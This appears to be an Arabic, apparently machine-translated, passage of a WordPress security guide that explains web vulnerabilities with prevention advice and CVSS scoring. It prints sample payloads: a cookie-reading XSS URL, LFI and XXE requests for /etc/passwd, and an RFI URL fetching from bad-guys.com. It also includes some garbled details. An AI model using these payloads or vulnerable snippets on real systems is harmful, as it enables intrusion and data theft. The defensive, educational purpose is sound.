تحدث ثغرة أمنية في البرمجة النصية عبر المواقع المستندة إلى DOM أو المستندة إلى نموذج كائن المستند عندما يكتب البرنامج النصي من جانب العميل الخاص بموقع الويب البيانات المقدمة من المستخدم إلى نموذج كائن المستند (DOM). يقوم موقع الويب بعد ذلك بقراءة تاريخ المستخدم من DOM وإخراجها إلى متصفح الويب الخاص بالزائر.

إذا لم يتم التعامل مع البيانات التي يوفرها المستخدم بشكل صحيح ، يمكن للمهاجم إدخال شفرة ضارة سيتم تنفيذها عندما يقرأ موقع الويب الشفرة من DOM.

ملاحظة: تعد XSS المنعكسة والمخزنة مشكلات من جانب الخادم بينما XSS المستندة إلى DOM هي مشكلة عميل (متصفح).

مثال على البرمجة النصية عبر المواقع المستندة إلى نموذج كائن المستند

طريقة شائعة لشرح هجوم DOM XSS على صفحة ترحيب مخصصة. بعد إنشاء حساب ، لنفترض أن yourfavesite.com تمت إعادة توجيهك إلى صفحة ترحيب مخصصة للترحيب بك بالاسم باستخدام الكود أدناه. ويتم ترميز اسم المستخدم في URL.

 <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+8; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to yourfavesite.com! … </HTML>

لذلك ، سيكون لدينا عنوان URL الخاص بـ yourfavesite.com/account?name=yourname .

يمكن للمهاجم تنفيذ هجوم XSS قائم على DOM عن طريق إرسال عنوان URL التالي إلى المستخدم الجديد:

 http://yourfavesite.com/account?name=<script>alert(document.cookie)</script>

عندما ينقر المستخدم الجديد على الرابط ، يرسل متصفحه طلبًا لـ:

 /account?name=<script>alert(document.cookie)</script>

إلى bad-guys.com . يستجيب الموقع بالصفحة التي تحتوي على كود جافا سكريبت أعلاه.

يقوم مستعرض المستخدم الجديد بإنشاء كائن DOM للصفحة ، حيث يحتوي الكائن document.location على السلسلة:

 http://www.bad-guys.com/account?name=<script>alert(document.cookie)</script>

لا تتوقع الكود الأصلي في الصفحة أن تحتوي المعلمة الافتراضية على ترميز HTML ، مما يكرر الترميز على الصفحة. ثم سيعرض متصفح المستخدم الجديد الصفحة وينفذ البرنامج النصي للمهاجم:

 alert(document.cookie)

كيفية منع البرمجة النصية عبر المواقع المستندة إلى DOM

القاعدة رقم 1 في ورقة الغش الخاصة بمنع البرمجة النصية عبر المواقع المستندة إلى OWASP Dom هي هروب HTML. بعد ذلك ، هرب JS قبل إضافة بيانات غير موثوق بها إلى نص HTML الفرعي ضمن سياق التنفيذ.

أمثلة على طرق HTML الخطرة:

صفات

 element.innerHTML = "<HTML> Tags and markup"; element.outerHTML = "<HTML> Tags and markup";

أساليب

 document.write("<HTML> Tags and markup"); document.writeln("<HTML> Tags and markup");

لإجراء تحديثات ديناميكية على HTML في DOM الآمن ، توصي OWASP بما يلي:

1. ترميز HTML ، وبعد ذلك
2. ترميز JavaScript لجميع المدخلات غير الموثوق بها ، كما هو موضح في هذه الأمثلة:

 element.innerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"; element.outerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>";

 document.write("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"); document.writeln("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>");

8. عبر الموقع طلب التزوير الضعف

تحدث ثغرة CSRF أو Cross-Site Request Forgery عندما يخدع مجرم إلكتروني مستخدمًا للقيام بإجراءات غير مقصودة. يقوم المهاجم بتزوير طلب المستخدم لأحد التطبيقات.

مثال على التزوير عبر الموقع

في تقرير ثغرات WordPress لشهر يناير 2020 ، قمنا بالإبلاغ عن الثغرة الأمنية عبر الموقع طلب التزوير الموجودة في المكون الإضافي Code Snippets. (تم تصحيح المكوّن الإضافي بسرعة في الإصدار 2.14.0)

سمح افتقار المكون الإضافي لحماية CRSF لأي شخص بتزوير طلب نيابة عن مسؤول وحقن رمز قابل للتنفيذ على موقع ضعيف. كان من الممكن أن يستغل المهاجم هذه الثغرة الأمنية لتنفيذ تعليمات برمجية ضارة وحتى إجراء عملية استيلاء كاملة على الموقع.

كيفية منع التزوير عبر الموقع

تحتوي معظم أطر عمل التشفير على دفاعات رمزية متزامنة مدمجة للحماية من CSRF ، ويجب استخدامها.

هناك أيضًا مكونات خارجية مثل CSRF Protector Project التي يمكن استخدامها لحماية ثغرات PHP و Apache CSRF.

9. طلب ​​جانب الخادم لضعف التزوير

تسمح الثغرة الأمنية SSRF أو Server-Site Request Forger للمهاجم بخداع تطبيق من جانب الخادم لتقديم طلبات HTTP إلى مجال عشوائي من اختيارهم.

مثال على تزوير الطلب من جانب الخادم

يمكن استغلال ثغرة أمنية في SSRF لتنفيذ هجوم برمجة عبر الموقع المنعكس. يمكن للمهاجم جلب برنامج نصي ضار من bad-guys.com وتقديمه لجميع زوار موقع الويب.

كيفية منع تزوير الطلب من جانب الخادم

الخطوة الأولى للتخفيف من ثغرات SSRF هي التحقق من صحة المدخلات. على سبيل المثال ، إذا كان الخادم الخاص بك يعتمد على عناوين URL التي يوفرها المستخدم لجلب ملفات مختلفة ، فيجب عليك التحقق من صحة عنوان URL والسماح فقط للمضيفين المستهدفين الذين تثق بهم.

لمزيد من المعلومات حول منع SSRF ، راجع ورقة الغش OWASP.

10. الضعف في تصعيد الامتياز

تسمح ثغرة تصعيد الامتياز للمهاجم بتنفيذ المهام التي تتطلب عادةً امتيازات ذات مستوى أعلى.

مثال على تصعيد الامتياز

في تقرير ثغرات WordPress لشهر نوفمبر 2020 ، أبلغنا عن ثغرة أمنية في تصعيد الامتياز تم العثور عليها في المكون الإضافي Ultimate Member (تم تصحيح الثغرة الأمنية في الإصدار 2.1.12).

يمكن للمهاجم توفير معلمة مصفوفة wp_capabilities تعريف المستخدم wp_capabilities الذي يحدد دور المستخدم. أثناء عملية التسجيل ، تم تمرير تفاصيل التسجيل update_profile وظيفة update_profile ، وسيتم update_profile أي بيانات وصفية تم إرسالها ، بغض النظر عن ما تم إرساله ، لهذا المستخدم المسجل حديثًا.

سمحت الثغرة الأمنية بشكل أساسي للمستخدم الجديد بطلب المسؤول عند التسجيل.

كيفية منع تصعيد الامتياز

يمكن أن يساعد iThemes Security Pro في حماية موقع الويب الخاص بك من التحكم في الوصول المعطل عن طريق تقييد وصول المسؤول إلى قائمة الأجهزة الموثوقة.

11. ثغرة أمنية في تنفيذ التعليمات البرمجية عن بُعد

تسمح الثغرة الأمنية RCE أو Remote Code Execution للمهاجم بالوصول وإجراء تغييرات عليه وحتى الاستيلاء على جهاز كمبيوتر أو خادم.

مثال على تنفيذ التعليمات البرمجية عن بعد

في عام 2018 ، كشفت Microsoft عن ثغرة أمنية في تنفيذ التعليمات البرمجية عن بُعد وجدت في Excel.

يمكن للمهاجم الذي نجح في استغلال الثغرة الأمنية تشغيل تعليمات برمجية عشوائية في سياق المستخدم الحالي. إذا تم تسجيل دخول المستخدم الحالي بحقوق مستخدم إدارية ، يمكن للمهاجم التحكم في النظام المتأثر. يمكن للمهاجم بعد ذلك تثبيت البرامج ؛ عرض البيانات أو تغييرها أو حذفها ؛ أو إنشاء حسابات جديدة مع حقوق المستخدم الكاملة. يمكن أن يكون المستخدمون الذين تم تكوين حساباتهم بحيث يكون لها حقوق مستخدم أقل على النظام أقل تأثرًا من المستخدمين الذين يعملون بحقوق مستخدم إداري.

كيفية منع تنفيذ التعليمات البرمجية عن بعد

أسهل طريقة للتخفيف من ثغرة RCE هي التحقق من صحة إدخال المستخدم عن طريق تصفية وإزالة أي أحرف غير مرغوب فيها.

تحتوي شركتنا الأم Liquid Web ، على مقال رائع حول منع تنفيذ التعليمات البرمجية عن بُعد.

14. ملف إدراج الضعف

تحدث ثغرة تضمين ملف عندما يسمح تطبيق ويب للمستخدم بإرسال مدخلات إلى الملفات أو تحميل الملفات إلى الخادم.

هناك نوعان من الثغرات الأمنية المتعلقة بتضمين الملفات ، المحلية والبعيدة.

15. ضعف تضمين الملف المحلي

تسمح ثغرة LFI أو Local File Inclusion للمهاجم بقراءة الملفات وتنفيذها أحيانًا على خادم موقع الويب.

مثال تضمين الملف المحلي

دعنا نلقي نظرة أخرى على yourfavesite.com ، حيث لا يتم تطهير المسارات التي تم تمريرها include العبارات بشكل صحيح. على سبيل المثال ، دعنا نلقي نظرة على عنوان URL أدناه.

 yourfavesite.com/module.php?file=example.file

يمكن للمهاجم أن يغير معلمة URL للوصول إلى ملف عشوائي على الخادم.

 yourfavesite.com/module.php?file=etc/passwd

قد يسمح تغيير قيمة الملف في عنوان URL للمهاجم بعرض محتويات ملف psswd.

كيفية منع تضمين الملف المحلي

قم بإنشاء قائمة مسموح بها بالملفات التي قد تتضمنها الصفحة ، ثم استخدم معرفًا للوصول إلى الملف المحدد. ثم قم بحظر أي طلب يحتوي على معرف غير صالح.

16. ثغرة أمنية خاصة بإدراج الملفات عن بعد

تسمح الثغرة الأمنية RFI أو Remote File Inclusion للمهاجم بتضمين ملف ، وعادةً ما يستغل آليات "التضمين الديناميكي للملف" المطبقة في التطبيق الهدف.

مثال على تضمين ملف بعيد

تم إغلاق WordPress Plugin WP مع Spritz في مستودع WordPress.org لأنه يحتوي على ثغرة في RFI.

فيما يلي الكود المصدري للثغرة الأمنية:

 if(isset($_GET['url'])){ $content=file_get_contents($_GET['url']);

يمكن استغلال الكود عن طريق تغيير قيمة content.filter.php?url= value. على سبيل المثال:

 yoursite.com//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://bad-guys.com/exec

منع تضمين الملفات عن بعد

قم بإنشاء قائمة مسموح بها بالملفات التي قد تتضمنها الصفحة ، ثم استخدم معرفًا للوصول إلى الملف المحدد. ثم قم بحظر أي طلب يحتوي على معرف غير صالح.

17. ثغرة أمنية لمسح الدليل

تسمح الثغرة الأمنية لمسح الدليل أو اجتياز الملفات للمهاجم بقراءة ملفات عشوائية على الخادم الذي يقوم بتشغيل أحد التطبيقات.

مثال اجتياز الدليل

كانت إصدارات WordPress 5.7 - 5.03 عرضة لهجمات اجتياز الدليل لأنها فشلت في التحقق من بيانات إدخال المستخدم بشكل صحيح. يمكن للمهاجم الذي لديه حق الوصول إلى حساب يتمتع بامتيازات author على الأقل استغلال الثغرة الأمنية لاجتياز الدليل وتنفيذ كود PHP ضار على الخادم الأساسي ، مما يؤدي إلى استيلاء كامل عن بُعد.

كيفية منع اجتياز الدليل

يمكن للمطورين استخدام الفهارس بدلاً من الأجزاء الفعلية لأسماء الملفات عند عمل قوالب أو استخدام ملفات اللغة.

18. الضعف في إعادة التوجيه الخبيث

تسمح ثغرة إعادة التوجيه الضارة للمهاجم بحقن رمز لإعادة توجيه زوار الموقع إلى موقع ويب آخر.

مثال على إعادة التوجيه الضار

لنفترض أنك تبحث عن سترة زرقاء باستخدام أداة البحث في متجر عبر الإنترنت.

لسوء الحظ ، فشل خادم المتجر في تشفير مدخلات المستخدم بشكل صحيح ، وتمكن المهاجم من إدخال برنامج نصي لإعادة التوجيه ضار في استعلام البحث الخاص بك.

لذلك ، عندما تكتب سترة زرقاء في حقل البحث الخاص بالمتجر وتضغط على إدخال ، ينتهي بك الأمر في صفحة الويب الخاصة بالمهاجم بدلاً من صفحة البوتيك بسترات تطابق وصف بحثك.

كيفية منع إعادة التوجيه الضارة

يمكنك الحماية من عمليات إعادة التوجيه الضارة عن طريق تطهير مدخلات المستخدم ، والتحقق من صحة عناوين URL ، والحصول على تأكيد الزائر لجميع عمليات إعادة التوجيه خارج الموقع.

19. ثغرة XML الخارجية للكيان

تسمح الثغرة الأمنية للكيان الخارجي XXE أو XML للمهاجم بخداع محلل XML لتمرير معلومات حساسة إلى كيان خارجي يخضع لسيطرته.

مثال على كيان خارجي لـ XML

يمكن للمهاجم استغلال ثغرة XXE للوصول إلى الملفات الحساسة مثل etc / passwd ، الذي يخزن معلومات حساب المستخدم.

 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

كيفية منع الكيان الخارجي XML

أفضل طريقة لمنع XXE هي استخدام تنسيقات بيانات أقل تعقيدًا مثل JSON وتجنب تسلسل البيانات الحساسة.

20. هجوم الحرمان من الخدمة

هجوم DoS أو رفض الخدمة هو محاولة متعمدة لجعل موقع الويب أو التطبيق الخاص بك غير متاح للمستخدمين عن طريق إغراقه بحركة مرور الشبكة.

في هجوم رفض الخدمة الموزع DDoS ، يستخدم المهاجم مصادر متعددة لإغراق الشبكة بحركة المرور. سيقوم المهاجم باختطاف مجموعات من أجهزة الكمبيوتر وأجهزة التوجيه وأجهزة إنترنت الأشياء المصابة بالبرامج الضارة لزيادة تدفق حركة المرور.

مثال هجوم رفض الخدمة

تم فرض أكبر هجوم DDoS (رفض الخدمة الموزع) على AWS في فبراير من هذا العام. أفادت أمازون أن AWS Shield ، خدمة الحماية من التهديدات المُدارة الخاصة بها ، لاحظت وتخفيف هجوم DDoS الضخم هذا. استمر الهجوم 3 أيام وبلغ ذروته عند 2.3 تيرابايت في الثانية.

كيفية منع هجوم رفض الخدمة

هناك طريقتان رئيسيتان للتخفيف من هجوم DoS.

1. شراء استضافة أكثر مما تحتاج. يمكن أن يساعدك امتلاك موارد إضافية تحت تصرفك على تجاوز الطلب المتزايد الناجم عن هجوم DoS.
2. استخدم جدار حماية على مستوى الخادم مثل Cloudflare. يمكن لجدار الحماية اكتشاف ارتفاع غير عادي في حركة المرور ومنع تحميل موقع الويب الخاص بك بشكل زائد.

21. تسجيل ضغطات المفاتيح

يحدث تسجيل ضغطات المفاتيح ، المعروف أيضًا باسم Keylogging أو التقاط لوحة المفاتيح ، عندما يقوم أحد المتطفلين بمراقبة ضغطات مفاتيح زوار موقع الويب وتسجيلها.

مثال على تسجيل ضغطات المفاتيح

في عام 2017 ، نجح أحد المتسللين في تثبيت JavaScript ضار على خادم صانع الهواتف الذكية OnePlus.

باستخدام الشفرة الخبيثة ، قام المهاجمون بمراقبة ضغطات مفاتيح عملاء OnePlus وتسجيلها أثناء قيامهم بإدخال تفاصيل بطاقة الائتمان الخاصة بهم. قام المتسللون بتسجيل وجمع ضغطات المفاتيح لـ 40.000 عميل قبل أن يكتشف OnePlus الاختراق ويصلحه.

كيفية منع تسجيل ضغطات المفاتيح

تحديث كل شيء! عادة ، سيحتاج المهاجم إلى استغلال ثغرة أمنية موجودة أخرى لإدخال برنامج تسجيل لوحة مفاتيح على جهاز كمبيوتر أو خادم. سيؤدي الحفاظ على كل شيء محدثًا بأحدث تصحيحات الأمان إلى منع إعطاء المتسللين طريقة سهلة لتثبيت برنامج keylogger على موقع الويب الخاص بك أو جهاز الكمبيوتر الخاص بك.

المكافأة: التصيد

الثغرات الأمنية في البرامج هي الشيء الوحيد الذي يحاول المتسللون ومجرمو الإنترنت استغلاله. القراصنة أيضا يستهدفون ويستغلون البشر. إحدى طرق الاستغلال الشائعة هي التصيد الاحتيالي.

ما هو التصيد؟

التصيد الاحتيالي هو أسلوب هجوم إلكتروني يستخدم البريد الإلكتروني ووسائل التواصل الاجتماعي والرسائل النصية والمكالمات الهاتفية لخداع الضحية للتخلي عن المعلومات الشخصية. سيستخدم المهاجم بعد ذلك المعلومات للوصول إلى الحسابات الشخصية أو ارتكاب عملية احتيال تتعلق بالهوية.

كيف تكتشف رسالة بريد إلكتروني مخادعة

كما تعلمنا سابقًا في هذا المنشور ، تتطلب بعض نقاط الضعف نوعًا من تفاعل المستخدم لاستغلالها. تتمثل إحدى الطرق التي يخدع بها الهاكر الناس في المشاركة في مساعيهم الشائنة عن طريق إرسال رسائل بريد إلكتروني للتصيد الاحتيالي.

إن تعلم كيفية اكتشاف رسالة بريد إلكتروني تصيدية يمكن أن يوفر عليك من اللعب عن غير قصد في خطط مجرمي الإنترنت.

4 نصائح لاكتشاف رسائل البريد الإلكتروني المخادعة :

1. انظر إلى عنوان البريد الإلكتروني من - إذا تلقيت بريدًا إلكترونيًا من شركة ، فيجب أن يتطابق جزء عنوان البريد الإلكتروني للمرسل بعد "@" مع اسم النشاط التجاري.
   
   إذا كان البريد الإلكتروني يمثل شركة أو كيانًا حكوميًا ولكنه يستخدم عنوان بريد إلكتروني عام مثل "gmail" ، فهذه علامة على رسالة بريد إلكتروني للتصيد الاحتيالي.
   
   ترقب الأخطاء الإملائية الدقيقة في اسم المجال. على سبيل المثال ، دعنا نلقي نظرة على عنوان البريد الإلكتروني هذا [البريد الإلكتروني المحمي] يمكننا أن نرى أن Netflix يحتوي على علامة "x" إضافية في النهاية. الخطأ الإملائي هو علامة واضحة على أن البريد الإلكتروني تم إرساله بواسطة محتال ويجب حذفه على الفور.
   
2. ابحث عن الأخطاء النحوية - يعد البريد الإلكتروني المليء بالأخطاء النحوية علامة على وجود بريد إلكتروني ضار. قد يتم تهجئة جميع الكلمات بشكل صحيح ، لكن الجمل تفتقد إلى الكلمات التي تجعل الجملة متماسكة. على سبيل المثال ، "تم اختراق حسابك. تحديث كلمة المرور لأمان الحساب ".
   
   الجميع يرتكب أخطاء ، وليس كل بريد إلكتروني به خطأ إملائي أو اثنين هو محاولة للاحتيال عليك. ومع ذلك ، فإن الأخطاء النحوية المتعددة تتطلب نظرة فاحصة قبل الرد.
   
3. المرفقات أو الروابط المشبوهة - من المفيد التوقف للحظة قبل التفاعل مع أي مرفقات أو روابط مضمنة في رسالة بريد إلكتروني.
   
   إذا لم تتعرف على مرسل رسالة البريد الإلكتروني ، فلا يجب عليك تنزيل أي مرفقات مضمنة في البريد الإلكتروني لأنها قد تحتوي على برامج ضارة وتصيب جهاز الكمبيوتر الخاص بك. إذا كان البريد الإلكتروني يدعي أنه من شركة ، فيمكنك Google معلومات الاتصال الخاصة بهم للتحقق من إرسال البريد الإلكتروني منهم قبل فتح أي مرفقات.
   
   إذا احتوت رسالة بريد إلكتروني على ارتباط ، فيمكنك تحريك مؤشر الماوس فوق الارتباط للتحقق من أن عنوان URL يوجهك إلى المكان الذي ينبغي أن يكون فيه.
   
4. احترس من الطلبات العاجلة - الحيلة الشائعة التي يستخدمها المحتالون هي خلق شعور بالإلحاح. قد يصنع البريد الإلكتروني الضار سيناريو يحتاج إلى إجراء فوري. كلما كان لديك وقت أطول للتفكير ، زادت فرصة التعرف على الطلب الذي يأتي من محتال.
   
   قد تتلقى بريدًا إلكترونيًا من "رئيسك" يطلب منك الدفع للبائع في أسرع وقت ممكن أو من البنك الذي تتعامل معه لإعلامك بأن حسابك قد تم اختراقه وأن الإجراء الفوري مطلوب.

كيفية قياس شدة ضعف WordPress

هناك عدة أنواع من نقاط الضعف في WordPress ، وكلها بدرجات متفاوتة من المخاطر. لحسن الحظ بالنسبة لنا ، فإن قاعدة البيانات الوطنية للثغرات الأمنية - وهي مشروع تابع للمعهد الوطني للعلوم والتكنولوجيا - لديها آلة حاسبة لنظام نقاط الضعف لتحديد مخاطر الضعف.

سيغطي هذا القسم من دليل الثغرات الأمنية في WordPress مقاييس نظام تسجيل نقاط الضعف ومستويات الخطورة. في حين أن هذا القسم أكثر تقنية إلى حد ما ، فقد يجد بعض المستخدمين أنه مفيد لتعميق فهمهم لكيفية تقييم ثغرات WordPress وشدتها.

مقاييس نظام نقاط الضعف الشائعة في WordPress

تستخدم معادلة نظام تسجيل نقاط الضعف ثلاث مجموعات مختلفة من الدرجات لتحديد درجة الخطورة الإجمالية.

1. المقاييس الأساسية

تمثل مجموعة المقاييس الأساسية خصائص الثغرة الأمنية الثابتة عبر بيئات المستخدم.

تنقسم المقاييس الأساسية إلى مجموعتين ، القابلية للاستغلال والتأثير.

1.1 مقاييس الاستغلال

تعتمد درجة قابلية الاستغلال على مدى صعوبة استغلال المهاجم للثغرة الأمنية. يتم احتساب النتيجة باستخدام 5 متغيرات مختلفة.

1.1.1. ناقل الهجوم (AV)

تعتمد درجة متجه الهجوم على الطريقة التي يتم بها استغلال الثغرة الأمنية. ستكون النتيجة أعلى كلما كان المهاجم بعيدًا عن استغلال الثغرة الأمنية.

الفكرة هي أن عدد المهاجمين المحتملين سيكون أكبر بكثير إذا كان من الممكن استغلال الثغرة الأمنية عبر شبكة مقارنة بالثغرة التي تتطلب الوصول المادي إلى جهاز استغلال.

فكلما زاد عدد المهاجمين المحتملين ، زادت مخاطر الاستغلال ، وبالتالي ، ستكون درجة ناقل الهجوم الممنوحة للثغرة الأمنية أعلى.

1.1.2. تعقيد الهجوم (AC)

تعتمد قيمة التعقيد على الشروط المطلوبة لاستغلال الثغرة الأمنية. قد تتطلب بعض الشروط جمع مزيد من المعلومات حول الهدف أو وجود إعدادات معينة لتكوين النظام أو استثناءات حسابية.

ستكون درجة تعقيد الهجوم أعلى كلما انخفض مستوى التعقيد المطلوب لاستغلال الثغرة الأمنية.

1.1.3. الامتيازات المطلوبة (العلاقات العامة)

يتم احتساب نقاط الامتيازات المطلوبة بناءً على الامتيازات التي يجب على المهاجم الحصول عليها قبل استغلال الثغرة الأمنية. سنغوص في هذا الأمر أكثر قليلاً في قسم المصادقة مقابل عدم المصادقة.

ستكون النتيجة أعلى إذا لم تكن هناك امتيازات مطلوبة.

1.1.4. تفاعل المستخدم (UI)

يتم تحديد درجة تفاعل المستخدم بناءً على ما إذا كانت الثغرة تتطلب تفاعل المستخدم لاستغلالها أم لا.

ستكون النتيجة أعلى عندما لا يكون هناك حاجة لتفاعل المستخدم للمهاجم لاستغلال الثغرة الأمنية.

1.1.5. نطاق

تعتمد درجة النطاق على ثغرة أمنية في أحد مكونات البرنامج للتأثير على الموارد خارج نطاق الأمان الخاص بها.

يشمل نطاق الأمان المكونات الأخرى التي توفر وظائف لهذا المكون فقط ، حتى لو كان لهذه المكونات الأخرى سلطة الأمان الخاصة بها.

تكون الدرجة أعلى عند حدوث تغيير في النطاق.

1.2 مقاييس التأثير

مقاييس التأثير تلتقط التأثيرات المباشرة لثغرة أمنية تم استغلالها بنجاح.

1.2.1. التأثير السري (ج)

تقيس درجة التأثير السرية هذه التأثير على سرية المعلومات التي تديرها البرامج المستغلة.

تكون النتيجة أعلى عندما تكون الخسارة للبرنامج المتأثر أعلى.

1.2.2. النزاهة (I)

تعتمد درجة النزاهة هذه على تأثير ثغرة أمنية تم استغلالها بنجاح.

تكون النتيجة أعلى عندما تكون نتيجة البرنامج المتأثر أكبر.

1.2.3. التوفر (أ)

تعتمد درجة الإتاحة على تأثير توافر البرامج المستغلة.

تكون الدرجة أعلى عندما تكون نتيجة المكون المتأثر أكبر.

حساب النتيجة الأساسية CVSS

النتيجة الأساسية هي دالة لمعادلات النتيجة الفرعية للتأثير وقابلية الاستغلال. حيث يتم تحديد الدرجة الأساسية على أنها ،

 If (Impact sub score <= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase - 0.029] - 3.25 × [ISCBase - 0.02] 15 Where, ISCBase = 1 - [(1 - ImpactConf) × (1 - ImpactInteg) × (1 - ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

2. مقاييس النتيجة الزمنية

تقيس المقاييس الزمنية الحالة الحالية لتقنيات استغلال الثغرات ، ووجود أي تصحيحات أو حلول بديلة ، أو الثقة التي يتمتع بها المرء في وصف الثغرة الأمنية.

من المتوقع أن تتغير المقاييس الزمنية وستتغير بمرور الوقت.

2.1. نضج كود برمجيات إكسبلويت (هـ)

يعتمد نضج كود برمجيات إكسبلويت على احتمالية تعرض الثغرة للهجوم.

كلما كان من الأسهل استغلال الثغرة الأمنية ، زادت نقاط الضعف.

2.2. مستوى المعالجة (RL)

يعد مستوى معالجة الثغرات عاملاً مهمًا في تحديد الأولويات. قد تقدم الحلول البديلة أو الإصلاحات العاجلة علاجًا مؤقتًا حتى يتم إصدار تصحيح رسمي أو ترقية.

كلما كان الإصلاح أقل رسمية ودائمة ، زادت درجة الضعف.

2.3 تقرير الثقة (RC)

يقيس مقياس الثقة في التقرير مستوى الثقة بوجود ثغرة أمنية ومصداقية التفاصيل الفنية.

كلما تم التحقق من ثغرة أمنية من قبل البائع أو مصادر أخرى حسنة السمعة ، زادت الدرجة.

حساب نقاط CVSS الزمني

يتم تعريف الدرجة الزمنية على أنها ،

 Roundup(BaseScore v× ExploitCode Maturity × RemediationLevel × ReportConfidence)

3. مقاييس النتائج البيئية

تسمح المقاييس البيئية للمحللين بتخصيص درجات CVSS بناءً على أهمية أصول تكنولوجيا المعلومات المتأثرة.

تعد مقاييس الاستغلال والتأثير البيئي مكافئًا معدلًا للمقاييس الأساسية ويتم تعيين قيم بناءً على موضع مكون البنية التحتية التنظيمية. راجع أقسام المقاييس الأساسية أعلاه لعرض قيم وأوصاف مقاييس قابلية الاستغلال والتأثير.

تحتوي المقاييس البيئية على مجموعة إضافية ، معدِّلات التأثير الفرعي.

3.1. مقاييس معدِّلات النتيجة الفرعية للتأثير

تقوم مقاييس معدِّلات التأثير الفرعي بتقييم متطلبات الأمان المحددة للسرية (CR) والنزاهة (IR) والتوافر (AR) ، مما يسمح بضبط النتيجة البيئية وفقًا لبيئة المستخدمين.

حساب نقاط CVSS البيئية

يتم تحديد النتيجة البيئية على أنها ،

 If (Modified Impact Sub score <= 0) 0 else, If Modified Scope is Unchanged Round up(Round up (Minimum [ (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) If Modified Scope is Changed Round up(Round up (Minimum [1.08 × (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) And the modified Impact sub score is defined as, If Modified Scope is Unchanged 6.42 × [ISC Modified ] If Modified Scope is Changed 7.52 × [ISC Modified - 0.029]-3.25× [ISC Modified × 0.9731 - 0.02] 13 Where, ISC Modified = Minimum [[1 - (1 - M.IConf × CR) × (1 - M.IInteg × IR) × (1 - M.IAvail × AR)], 0.915] The Modified Exploitability sub score is, 8.22 × M.AttackVector × M.AttackComplexity × M.PrivilegeRequired × M.UserInteraction 4 Where “Round up” is defined as the smallest number, specified to one decimal place, that is equal to or higher than its input. For example, Round up (4.02) is 4.1; and Round up (4.00) is 4.0.

مجموع نقاط وشدة CVSS

نظام نقاط الضعف المشترك العام أو درجة CVSS عبارة عن تمثيل للدرجات الأساسية والزمنية والبيئية.

يمكن استخدام النتيجة الإجمالية لـ CVSS لإعطائك فكرة عن مدى خطورة أو خطورة الثغرة.

مثال على تصنيف خطورة العالم الحقيقي CVSS

في تقرير الثغرات الأمنية لشهر ديسمبر 2020 ، أبلغنا عن وجود ثغرة أمنية في المكون الإضافي Easy WP SMTP. سمحت ثغرة يوم الصفر (سنغطي ثغرات يوم الصفر في القسم التالي) للمهاجم بالتحكم في حساب المسؤول وكان يتم استغلاله في البرية.

بإلقاء نظرة على إدخال قاعدة البيانات الوطنية للثغرات الأمنية ، يمكننا العثور على تصنيف خطورة ثغرة WP SMTP.

دعنا نفصل شيئين من لقطة شاشة WP SMTP NVDB أعلاه.

النتيجة الأساسية: الدرجة الأساسية 7.5 ، مما يخبرنا أن تصنيف شدة الثغرة الأمنية مرتفع.

المتجه : يخبرنا المتجه أن النتيجة تستند إلى معادلات الضعف CVSS 3.1 والمقاييس المستخدمة لحساب النتيجة.

هنا جزء المقاييس من المتجه.

 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

الآن دعنا نستخدم قيم وأوصاف المقياس الأساسي من سابقًا في هذا المنشور لفهم القيم المترية الثمانية للمتجه.

1. AV: N - هذا يعني أن ناقل الهجوم (AV) للثغرة الأمنية هو الشبكة (N). بمعنى آخر ، يحتاج المهاجم فقط إلى الوصول إلى الشبكة لاستغلال الثغرة الأمنية.
2. AC: L - تعقيد الهجوم (AC) للثغرة منخفض (L). بمعنى آخر ، يمكن لأي طفل نصي استغلال الثغرة الأمنية.
3. PR: N - الامتيازات المطلوبة (PR) اللازمة لاستغلال الثغرة الأمنية هي لا شيء (N). لذلك ، لا تتطلب الثغرة الأمنية استغلالها من قِبل مستخدم مُصادق. (سنغطي الفرق بين الثغرات الأمنية المصدق عليها وغير المصادق عليها لاحقًا في هذا المنشور.)
4. UI: N - إن تفاعل المستخدم (UI) المطلوب لاستغلال هذه الثغرة الأمنية هو بلا (N). لذلك ، يمتلك المهاجم الوسائل لاستغلال الثغرة الأمنية بنفسه.
5. S: U - وهذا يعني أن نطاق (S) الثغرة الأمنية لم يتغير (U). في حالة هذه الثغرة الأمنية ، يكون المكون الضعيف والمكون المتأثر متماثلين.
6. C: H - تأثير السرية (C) للضعف مرتفع (H). عندما يتم استغلال هذه الثغرة الأمنية ، فإنها تؤدي إلى فقدان السرية التام.
7. I: N - إن تأثير النزاهة (I) لهذه الثغرة الأمنية لا يوجد (N). عندما يتم استغلال الثغرة الأمنية ، لا يوجد فقدان لسلامة أو مصداقية المعلومات المعرضة للخطر.
8. ج: ن - هذا يعني أن تأثير التوفر (أ) لا يوجد (س). عندما يتم استغلال الثغرة الأمنية ، لن يكون هناك أي تأثير على توفر موقع الويب الخاص بك.

يمكن أن تساعدنا نتيجة CVSS في تحديد شدة ونطاق أي ثغرة أمنية معينة. في القسمين التاليين ، سنغطي بعض مصطلحات الثغرات الأمنية المهمة التي غالبًا ما يتم تضمينها في عمليات الكشف عن الثغرات الأمنية.

تغليف

